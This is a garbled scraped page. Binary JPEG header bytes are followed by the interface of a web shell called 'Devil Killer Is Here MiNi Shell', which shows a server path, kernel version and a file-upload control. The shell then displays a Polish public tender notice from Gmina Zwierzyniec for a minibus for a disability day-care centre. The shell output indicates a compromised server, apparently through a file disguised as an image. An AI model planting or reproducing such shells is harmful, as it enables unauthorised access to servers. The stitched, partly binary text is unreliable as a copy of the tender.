JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250829/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250829/0039866201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup samochodu do przewozu osób niepełnosprawnych dla Środowiskowego Domu Samopomocy im. Ofiar Pacyfikacji w Sochach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zwierzyniec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950368718</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zwierzyniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-470</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zwierzyniec.info.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zwierzyniec.e-biuletyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup samochodu do przewozu osób niepełnosprawnych dla Środowiskowego Domu Samopomocy im. Ofiar Pacyfikacji w Sochach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-71c64a38-be34-4bab-9104-527b6b08f63b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00398662</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00032661/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 „Zakup samochodu do przewozu osób niepełnosprawnych dla Środowiskowego Domu Samopomocy im. Ofiar Pacyfikacji w Sochach”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.sidaspzp.pl/zamawiajacy/gmina-zwierzyniec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r.<br/>poz. 344). W sytuacji awarii Platformy zakupowej lub niedostępności Platformy zakupowej, uniemożliwiających komunikację<br/>Wykonawcy i Zamawiającego poprzez Platformę zakupową, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej<br/>na adres: przetargi@zwierzyniec.info.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem<br/>formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.<br/>Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w<br/>postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a<br/>wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pz., odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt, itp. Ofertę, a także oświadczenie o jakich mowa w Rozdziale 8 SWZ składa<br/>się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>Dokumentacja postępowania jest i w trakcie postępowania będzie upubliczniona na stronie<br/>https://zamowienia.sidaspzp.pl/zamawiajacy/gmina-zwierzyniec pod nazwą postępowania wskazaną w tytule SWZ oraz na stronie<br/>Biuletynu Informacji Publicznej pod nazwą postępowania wskazaną w tytule SWZ.<br/>Składanie ofert odbywa się poprzez portal pzp, który dostępny jest po zalogowaniu na stronie https://app.sidaspzp.pl<br/>Komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu<br/>ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/>Korespondencja przy użyciu środków komunikacji elektronicznej odbywa się w następujący sposób:<br/>1) Przed upływem terminu składania ofert (między innymi: pytania do postępowania, wnioski o wyjaśnienie SWZ):<br/>a) za pośrednictwem Platformy Zakupowej, gdzie po zalogowaniu się na uprzednio założone swoje konto, użytkownik wskazuje<br/>postępowanie. Po wejściu w szczegół wskazanego postępowania przechodzi do zakładki „Komunikacja”, która dotyczy wybranego<br/>postępowania. W celu przygotowania nowej wiadomości wybiera opcje „Utwórz wiadomość”. Następnie wskazuje „Kategorię<br/>wiadomości” i wprowadza treść w polu „Wiadomość”. W ramach korespondencji można dodać załącznik poprzez opcję „Dołącz plik”<br/>b) bezpośrednio na adres poczty elektronicznej:<br/>przetargi@zwierzyniec.info.pl<br/>2) Po upływie terminu składania ofert” (między innymi: dokumenty, oświadczenia, wyjaśnienia):<br/>a) Za pośrednictwem Platformy Zakupowej – analogicznie<br/>jak w przypadku korespondencji przed upływem terminu składania ofert.<br/>b) W sytuacji awarii Platformy zakupowej lub niedostępności Platformy zakupowej, uniemożliwiających komunikację Wykonawcy i<br/>Zamawiającego poprzez Platformę zakupową, Zamawiający dopuszcza komunikację za pomocą<br/>poczty elektronicznej na adres: przetargi@zwierzyniec.info.pl (nie dotyczy składania ofert).<br/>Komunikacja za pośrednictwem Platformy Zakupowej:<br/>1) Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. rejestrując się bezpłatnie lub w przypadku<br/>posiadania konta w portalu, logując się akceptuje warunki korzystania z portalu, określone w<br/>Ze względu na limit znaków pozostałe część warunków znajduje się w specyfikacji warunków zamówienia w rozdziale 11.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1 ze zmianami), dalej „RODO”, Zamawiający informuje, że:<br/>1) Gmina Zwierzyniec reprezentowana przez Burmistrza Zwierzyńca, adres:<br/>ul. Rynek 1, 22-470 Zwierzyniec, um@zwierzyniec.info.pl , tel.: 84 687 20 11 jest administratorem danych osobowych Wykonawcy oraz osób, których dane osobowe Wykonawca przekazał w niniejszym postępowaniu;<br/>2) Administrator wyznaczył Inspektora ochrony danych, z którym możesz kontaktować się we wszystkich sprawach dotyczących<br/>ochrony danych osobliwych pod adresem email: iod@zwierzyniec.info.pl .<br/>3) Dane osobowe Wykonawcy przetwarzane będą w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego o<br/>wartości przekraczającej 130 000 zł pt. „Zakup samochodu do przewozu osób niepełnosprawnych dla Środowiskowego Domu<br/>Samopomocy im. Ofiar Pacyfikacji w Sochach” prowadzonym w trybie podstawowym, na podstawie art. 6 ust. 1 lit. c RODO tj.<br/>wypełnienia obowiązku prawnego ciążącego na Administratorze, w związku z ustawą z 11 września 2019 r. Prawo zamówień<br/>publicznych.<br/>4) Odbiorcami danych osobowych Wykonawcy mogą być podmioty upoważnione na podstawie przepisów prawa, a także podmioty<br/>lub osoby, którym zostanie udostępniona dokumentacja postepowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień<br/>publicznych, a także podmiotom zewnętrznym, które wykonują usługi na zlecenie Administratora na podstawie umowy powierzenia<br/>przetwarzania danych osobowych np. firmie obsługującej serwisowo elektroniczny obieg dokumentacji w urzędzie czy firmie<br/>brakującej dokumentację niearchiwalną;<br/>5) Dane osobowe Wykonawcy będą przechowywane zgodnie z art. 78 ust. 1 i 4 usta-wy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych tj. przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego, niepodanie danych skutkuje brakiem możliwości uczestniczenia w<br/>postępowaniu;<br/>7) W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy, przy czym Zamawiający może żądać<br/>od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia,;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, przy czym skorzystanie z prawa do sprostowania lub<br/>uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; przy czym prawo do ograniczenia przetwarzania nie ma za-stosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;− prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza<br/>przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobo-wych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>_ na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKI-V.2710.18.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: zakup i dostawa fabrycznie nowego 9 osobowego mikrobusa dla potrzeb Środowiskowego<br/>Domu Samopomocy im. Ofiar Pacyfikacji w Sochach.<br/>Szczegółowy opis parametrów technicznych i wyposażenia pojazdu, o którym mowa w ust. 4.1, określa Załącznik nr 1 do<br/>SWZ – Opis przedmiotu zamówienia.<br/>Pojazd musi spełniać warunki określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz. U. z 2023<br/>poz. 1047 z późn. zm.) oraz odpowiadać warunkom technicznym określonym w Rozporządzeniu Ministra Infrastruktury z<br/>dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z<br/>2016 r. poz. 2022 z późn. zm.).<br/>Pojazd stanowiący przedmiot zamówienia winien:<br/>- być fabrycznie nowy, kompletny,<br/>- w pełni sprawny, gotowy do użytku, nie był rejestrowany ani używany przed dniem dostarczenia (z wyłączeniem używania<br/>niezbędnego dla przeprowadzenia dostosowań do wymagań Zamawiającego/Użytkownika),<br/>- spełniać warunki techniczne zgodnie z obowiązującymi w Polsce przepisami dla samochodów poruszających się po<br/>drogach publicznych oraz warunki określone w przepisach prawa wspólnotowego Unii Europejskiej;<br/>- spełniać wymagania określone w polskich normach dotyczące parametrów technicznych, budowy i rozwiązań<br/>konstrukcyjnych dla tego typu pojazdów, posiada właściwe świadectwo dopuszczenia do użytkowania i homologacje<br/>wydane zgodnie z obowiązującym w tej mierze przepisami;<br/>- być wolny od wad prawnych i fizycznych (konstrukcyjnych, materiałowych, wykonawczych), praw obciążeń ze strony osób<br/>trzecich oraz nie toczy się względem niego żadne postępowanie sądowe zabezpieczające, egzekucyjne ani inne, którego<br/>przedmiotem jest ten pojazd, ani nie stanowi on przedmiotu zabezpieczenia oraz że jest wolny od wszelkich roszczeń osób<br/>trzecich, a zainstalowane w nim urządzenia posiadają stosowne atesty i certyfikaty;<br/>- być oznaczony zgodnie z obowiązującymi przepisami oraz wymaganiami umowy o dofinansowanie ze środków PFRON w<br/>ramach „Programu wyrównywania różnic między regionami III” w obszarze D, zawartej pomiędzy Zamawiającym a<br/>Powiatem Zamojskim – oznakowanie dostarczy wykonawcy zamawiający.<br/>Wykonawca zobligowany jest do dostarczenia przedmiotu umowy w miejsce wskazane przez Zamawiającego.<br/>Wykonawca w ramach niniejszego zamówienia wraz z pojazdem zobowiązany jest dostarczyć Zamawiającemu pełną<br/>dokumentację techniczną pojazdu, o którym mowa powyżej oraz wymaganą przez prawo polskie dokumentacją niezbędną<br/>do jego pierwszej rejestracji oraz ubezpieczenia, obejmującą w szczególności: świadectwo homologacji podwozia pojazdu<br/>na terenie Rzeczypospolitej Polskiej, kartę gwarancyjną, książkę serwisową w języku polskim, instrukcję obsługi i<br/>konserwacji pojazdu wraz z katalogiem części zamiennych w języku polskim wraz ze wszystkimi dokumentami niezbędnymi<br/>do prawidłowej eksploatacji pojazdu przez Użytkownika, inne wymagane dokumenty niezbędne do pierwszej rejestracji<br/>pojazdu, komplet kluczy w liczbie dostarczonej przez producenta,<br/>Wykonawca w dniu dostawy pojazdu przeprowadzi szkolenie personelu Użytkownika w zakresie obsługi, konserwacji i<br/>bezpiecznego użytkowania pojazdu.<br/>W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązuje się do udzielenia na żądanie Zamawiającego<br/>wyjaśnień, informacji lub dokumentów niezbędnych do prawidłowego rozliczenia przyznanego dofinansowania ze środków<br/>PFRON.<br/>Długość okresu gwarancji na: zespoły elektryczne, elektroniczne i mechanizmy, łącznie z układem jezdnym, przeniesienia<br/>napędu, silnikiem, układem hamulcowym i zawieszeniem, podzespoły pojazdu, obejmującej funkcjonowanie pojazdu, wady<br/>materiałowe i fabryczne oraz na powłokę lakierniczą bez limitu kilometrów - stanowi kryterium oceny ofert. Zamawiający<br/>określa go na okres w przedziale od 24 miesięcy (termin minimalny) do 36 miesięcy (termin maksymalny). Zamawiającemu<br/>przysługują pełne uprawnienia z tytułu rękojmi za wady fizyczne wynikające z przepisów kodeksu cywilnego w terminach<br/>tam określonych – niezależnie od uprawnień z tytułu gwarancji.<br/>Gwarancja na perforację nadwozia wyłączona jest z ww. kryterium oceny ofert i wynosi min. 60 miesięcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34121000-1 - Autobusy i autokary</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na zespoły elektryczne, elektroniczne i mechanizmy, łącznie z układem jezdnym, przeniesienia napędu, silnikiem, układem hamulcowym i zawieszeniem, podzespoły pojazdu, obejmującej funkcjonowanie pojazdu, zabudowę, wady materiałowe i fabryczne oraz na powłokę lakierniczą bez limitu kilometrów (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga<br/>składania podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia z udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może<br/>sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach);<br/>Uwaga: Wykonawca ma obowiązek wskazać w Formularzu ofertowym<br/>producenta (markę) oraz model i wersję (wersję wskazuje się, jeżeli dany model pojazdu oferowany jest w różnych<br/>konfiguracjach) oferowanego pojazdu.<br/>W przypadku, gdy Wykonawca nie wskaże producenta lub modelu lub wersji oferowanego pojazdu Zamawiający odrzuci<br/>ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, z zastrzeżeniem art. 223 ustawy Pzp<br/>2) Wypełniony formularz – Szczegółowy opis przedmiotu zamówienia, stanowiący załącznik nr 1 do SWZ<br/>Wypełnienie formularza stanowi potwierdzenie zgodności oferowanego pojazdu z wymogami Zamawiającego. W przypadku,<br/>gdy Wykonawca nie potwierdzi wymaganych parametrów Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 5<br/>ustawy Pzp, z zastrzeżeniem art. 223 ustawy Pzp.<br/>3) 2) Oświadczenie wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia składane na podstawie art.<br/>125 ust. 1 ustawy Pzp, o którym mowa w rozdziale 8.1 